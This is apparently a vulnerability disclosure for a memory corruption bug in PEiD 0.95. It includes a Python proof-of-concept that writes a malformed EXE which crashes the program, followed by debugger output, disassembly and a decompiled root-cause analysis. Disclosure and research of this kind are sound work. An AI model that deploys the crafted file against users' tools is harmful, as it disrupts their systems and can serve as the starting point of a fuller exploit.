# Title: PEiD v0.95 Memory Corruption
# About PEiD : PEiD is an intuitive application that relies on its user-friendly interface to detect packers, cryptors and compilers found in PE executable files. Very popular among malware researchers for detection of packers / cryptors.
# Date: 22nd June 2013
# Author: Debasish Mandal ( https://twitter.com/debasishm89 )
# Blog : http://www.debasish.in/
# Version: PEiD version 0.95
# Download Link : http://www.softpedia.com/progChangelog/PEiD-updated-Changelog-4102.html
# Tested on: Windows XP SP2 / Windows 7
# Vendor Patch : Unpatched. This software is not under active development. Last stable version released on November 6th, 2008.
# Threat mitigation : Exploitation of this issue requires the user to explicitly open a specially crafted EXE file. So the PEiD user should refrain from opening files from untrusted third parties or accessing untrusted remote sites.
# POC
# c:\python27
junk = "\x41"
header = "MZ"
header += junk * 58
header += "\x80"
header += "\x00" * 3
header += junk * 64
header += "PE"
header += "\x00"*2
header += junk * 3
header += "\x00"
header += junk * 12
header += "\xe0\x00"
header += junk * 2
header += "\x0b\x01"
header += junk * 16
header += "\x00" * 2
header += junk * 338
header += "\x00" * 2
header += junk * 5
header += "\x00" * 3
header += junk * 2427
header += "\xa9"
header += junk * 7
header += "\x90"
header += junk * 3
header += "\x90"
header += junk * 40
f = open('peid_poc.exe','wb')
f.write(header)
f.close()
'''
Above python code will generate a crafted EXE. This EXE can be used as POC to trigger the Crash of PEiD version 0.95.
(9fc.c2c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=6fbeca5e ecx=00d4fae0 edx=00000019 esi=00000000 edi=91164141
eip=0043d4d1 esp=00d4faac ebp=00d4fee8 iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000286
*** WARNING: Unable to verify checksum for C:\Documents and Settings\debasish mandal\Desktop\Tools\PEiD-0.95-20081103\PEiD.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Documents and Settings\debasish mandal\Desktop\Tools\PEiD-0.95-20081103\PEiD.exe
PEiD+0x3d4d1:
0043d4d1 8a0c07 mov cl,byte ptr [edi+eax] ds:0023:91164141=??
PEiD Crashes at With Read AV @ 0043d4d1. EDI Register is pointing to ring0 : edi=91164141.
Stack Trace:
0:001> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00d4fee8 78b8c3c0 64123456 0000058f c4830000 PEiD+0x3d4d1
00d4ff04 0045d1e6 0040867c 00d4ff7c 00000000 0x78b8c3c0
00d4ff40 00455b97 0040867c 00d4ff7c 00000000 PEiD+0x5d1e6
00d4ffb4 7c80b50b 0048650c 001520a8 0012f4bc PEiD+0x55b97
00d4ffe0 7c80b517 00000000 00000000 00000000 kernel32!BaseThreadStart+0x37
00d4ffe4 00000000 00000000 00000000 00455a50 kernel32!BaseThreadStart+0x43
Stack Dump:
0:001> d esp
00d4faac 41 41 41 90 7c ff d4 00-40 ff d4 00 77 ca be 6f AAA.|...@...w..o
00d4fabc e0 fa d4 00 37 4c 44 00-41 41 16 91 77 ca be 6f ....7LD.AA..w..o
00d4facc dc fa d4 00 20 01 00 00-18 00 00 00 7c 86 40 00 .... .......|.@.
00d4fadc 90 41 91 7c e8 fe d4 00-19 00 00 00 08 00 00 00 .A.|............
00d4faec 1a 00 00 00 1a 00 00 00-1a 00 00 00 05 00 00 00 ................
00d4fafc 0c 00 00 00 1a 00 00 00-1a 00 00 00 1a 00 00 00 ................
00d4fb0c 1a 00 00 00 1a 00 00 00-1a 00 00 00 1a 00 00 00 ................
00d4fb1c 1a 00 00 00 1a 00 00 00-1a 00 00 00 1a 00 00 00 ................
00DFFAAC 90414141 <- ESP
00DFFAB0 00DFFF7C
00DFFAB4 00DFFF40
00DFFAB8 6FBECA77
00DFFABC 00DFFAE0
00DFFAC0 00444C37 RETURN to PEiD.00444C37 from PEiD.0043D4A0
00DFFAC4 91084141
00DFFAC8 6FBECA77
00DFFACC 00DFFADC
00DFFAD0 00000120
00DFFAD4 00000018
00DFFAD8 0040867C PEiD.0040867C
00DFFADC 7C914190 RETURN to ntdll.7C914190 from ntdll.7C910387
Disassembly of the function where program crashed. Function : PEiD.0043D4A0 (I've named it as "crash_function")
0043D4A0 51 PUSH ECX
0043D4A1 8B51 04 MOV EDX,DWORD PTR DS:[ECX+4]
0043D4A4 8B4424 0C MOV EAX,DWORD PTR SS:[ESP+C]
0043D4A8 3BC2 CMP EAX,EDX
0043D4AA 890C24 MOV DWORD PTR SS:[ESP],ECX
0043D4AD 7D 06 JGE SHORT PEiD.0043D4B5
0043D4AF 32C0 XOR AL,AL
0043D4B1 59 POP ECX
0043D4B2 C2 0C00 RETN 0C
0043D4B5 53 PUSH EBX
0043D4B6 55 PUSH EBP
0043D4B7 8BD8 MOV EBX,EAX
0043D4B9 56 PUSH ESI
0043D4BA 2BDA SUB EBX,EDX
0043D4BC 33F6 XOR ESI,ESI
0043D4BE 57 PUSH EDI
0043D4BF 8B7C24 18 MOV EDI,DWORD PTR SS:[ESP+18]
0043D4C3 85DB TEST EBX,EBX
0043D4C5 7E 34 JLE SHORT PEiD.0043D4FB
0043D4C7 33C0 XOR EAX,EAX
0043D4C9 85D2 TEST EDX,EDX
0043D4CB 7E 42 JLE SHORT PEiD.0043D50F
0043D4CD 8B29 MOV EBP,DWORD PTR DS:[ECX]
0043D4CF 03FE ADD EDI,ESI
0043D4D1 8A0C07 MOV CL,BYTE PTR DS:[EDI+EAX] <- Code crashes here
0043D4D4 3A0C28 CMP CL,BYTE PTR DS:[EAX+EBP]
0043D4D7 75 07 JNZ SHORT PEiD.0043D4E0
0043D4D9 40 INC EAX
0043D4DA 3BC2 CMP EAX,EDX
Setting a BP @ Entry 0x0043D4A0 of this function we can see the value of EDI register is already corrupted before entering into this function.
To find out the cross reference which means other function calling above function we used IDA Pro.
IDA Pro Shows us that this function is getting called multiple times:
Direction Type Address Text
--------- ---- ------- ----
Down p sub_43DF00+E1 call crash_function
Down p sub_43F260+1E9 call crash_function
Down p sub_43F260+230 call crash_function
Down p sub_43F260+312 call crash_function
Down p sub_43F260+346 call crash_function
Down p sub_43F260+382 call crash_function
Down p sub_43F260+3A9 call crash_function
Down p vuln_func+162 call crash_function
Down p sub_446020+1A5 call crash_function
Down p sub_446020+1C7 call crash_function
Down p sub_446020+20F call crash_function
Down p sub_446020+22D call crash_function
Down p sub_446020+271 call crash_function
Down p sub_446020+28F call crash_function
Down p sub_446020+2D6 call crash_function
Down p sub_446020+2F8 call crash_function
Down p sub_446020+339 call crash_function
Down p sub_446020+357 call crash_function
After Analyzing the code It was found found that below function is actually calling the PEiD.0043D4A0 function which triggers the crash:
This is the actual vulnerable function which causes the corruption.
00444AD0 81EC 2C040000 SUB ESP,42C
00444AD6 A1 D4A54000 MOV EAX,DWORD PTR DS:[40A5D4]
00444ADB 33C4 XOR EAX,ESP
00444ADD 898424 28040000 MOV DWORD PTR SS:[ESP+428],EAX
00444AE4 33C9 XOR ECX,ECX
00444AE6 56 PUSH ESI
00444AE7 8BB424 38040000 MOV ESI,DWORD PTR SS:[ESP+438]
00444AEE 8B46 0C MOV EAX,DWORD PTR DS:[ESI+C]
00444AF1 C68424 10040000 >MOV BYTE PTR SS:[ESP+410],89
00444AF9 C68424 11040000 >MOV BYTE PTR SS:[ESP+411],4A
00444B01 C68424 12040000 >MOV BYTE PTR SS:[ESP+412],0FC
00444B09 C68424 13040000 >MOV BYTE PTR SS:[ESP+413],33
00444B11 C68424 14040000 >MOV BYTE PTR SS:[ESP+414],0C0
00444B19 C68424 15040000 >MOV BYTE PTR SS:[ESP+415],0C3
00444B21 C68424 16040000 >MOV BYTE PTR SS:[ESP+416],0B8
00444B29 C68424 17040000 >MOV BYTE PTR SS:[ESP+417],78
00444B31 C68424 18040000 >MOV BYTE PTR SS:[ESP+418],56
00444B39 C68424 19040000 >MOV BYTE PTR SS:[ESP+419],34
00444B41 C68424 1A040000 >MOV BYTE PTR SS:[ESP+41A],12
00444B49 C68424 1B040000 >MOV BYTE PTR SS:[ESP+41B],64
00444B51 C68424 1C040000 >MOV BYTE PTR SS:[ESP+41C],8F
00444B59 C68424 1D040000 >MOV BYTE PTR SS:[ESP+41D],5
00444B61 888C24 1E040000 MOV BYTE PTR SS:[ESP+41E],CL
00444B68 888C24 1F040000 MOV BYTE PTR SS:[ESP+41F],CL
00444B6F 888C24 20040000 MOV BYTE PTR SS:[ESP+420],CL
00444B76 888C24 21040000 MOV BYTE PTR SS:[ESP+421],CL
00444B7D C68424 22040000 >MOV BYTE PTR SS:[ESP+422],83
00444B85 C68424 23040000 >MOV BYTE PTR SS:[ESP+423],0C4
00444B8D C68424 24040000 >MOV BYTE PTR SS:[ESP+424],4
00444B95 C68424 25040000 >MOV BYTE PTR SS:[ESP+425],55
00444B9D C68424 26040000 >MOV BYTE PTR SS:[ESP+426],53
00444BA5 C68424 27040000 >MOV BYTE PTR SS:[ESP+427],51
00444BAD C68424 28040000 >MOV BYTE PTR SS:[ESP+428],57
00444BB5 0FB740 06 MOVZX EAX,WORD PTR DS:[EAX+6]
00444BB9 83F8 02 CMP EAX,2
00444BBC 73 18 JNB SHORT PEiD.00444BD6
00444BBE 32C0 XOR AL,AL
00444BC0 5E POP ESI
00444BC1 8B8C24 28040000 MOV ECX,DWORD PTR SS:[ESP+428]
00444BC8 33CC XOR ECX,ESP
00444BCA E8 A88F0200 CALL PEiD.0046DB77
00444BCF 81C4 2C040000 ADD ESP,42C
00444BD5 C3 RETN
00444BD6 53 PUSH EBX
00444BD7 57 PUSH EDI
00444BD8 8B7E 18 MOV EDI,DWORD PTR DS:[ESI+18]
00444BDB 8D1480 LEA EDX,DWORD PTR DS:[EAX+EAX*4]
00444BDE 8B7CD7 EC MOV EDI,DWORD PTR DS:[EDI+EDX*8-14]
00444BE2 51 PUSH ECX
00444BE3 48 DEC EAX
00444BE4 50 PUSH EAX
00444BE5 8BCE MOV ECX,ESI
00444BE7 E8 748A0100 CALL PEiD.0045D660
00444BEC 8BD8 MOV EBX,EAX
00444BEE 8D043B LEA EAX,DWORD PTR DS:[EBX+EDI]
00444BF1 3B46 04 CMP EAX,DWORD PTR DS:[ESI+4]
00444BF4 76 1A JBE SHORT PEiD.00444C10
00444BF6 5F POP EDI
00444BF7 5B POP EBX
00444BF8 32C0 XOR AL,AL
00444BFA 5E POP ESI
00444BFB 8B8C24 28040000 MOV ECX,DWORD PTR SS:[ESP+428]
00444C02 33CC XOR ECX,ESP
00444C04 E8 6E8F0200 CALL PEiD.0046DB77
00444C09 81C4 2C040000 ADD ESP,42C
00444C0F C3 RETN
00444C10 6A 19 PUSH 19
00444C12 8D8C24 1C040000 LEA ECX,DWORD PTR SS:[ESP+41C]
00444C19 51 PUSH ECX
00444C1A 8D4C24 18 LEA ECX,DWORD PTR SS:[ESP+18]
00444C1E E8 1D87FFFF CALL PEiD.0043D340
00444C23 8B06 MOV EAX,DWORD PTR DS:[ESI]
00444C25 8D5424 0C LEA EDX,DWORD PTR SS:[ESP+C]
00444C29 52 PUSH EDX
00444C2A 53 PUSH EBX
00444C2B 03C7 ADD EAX,EDI
00444C2D 50 PUSH EAX
00444C2E 8D4C24 1C LEA ECX,DWORD PTR SS:[ESP+1C]
00444C32 E8 6988FFFF CALL PEiD.0043D4A0 <- CAll to the crash function
Equivalent C Code:
char vuln_func(int a1, int a2)
{
int v6;
v3 = (a2 + 12);
v9 = -119;
v10 = 74;
v11 = -4;
// Declaration of few more local variables. Ommited
v2 = (v3 + 6);
if ( v2 >= 2 )
{
v6 = ((a2 + 24) + 40 * v2 - 20); // <<---
v5 = before_crash1(a2, v2 - 1, 0);
if ((v5 + v6) <= (a2 + 4) )
{
before_crash2(&v9, 25);
result = crash_function((int)&v8, v6 + a2, v5, (int)&v7); //Vulnerable function calling the crash_function. Inside this peid prog. will crash
}
else
{
result = 0;
}
}
else
{
result = 0;
}
return result;
}
'''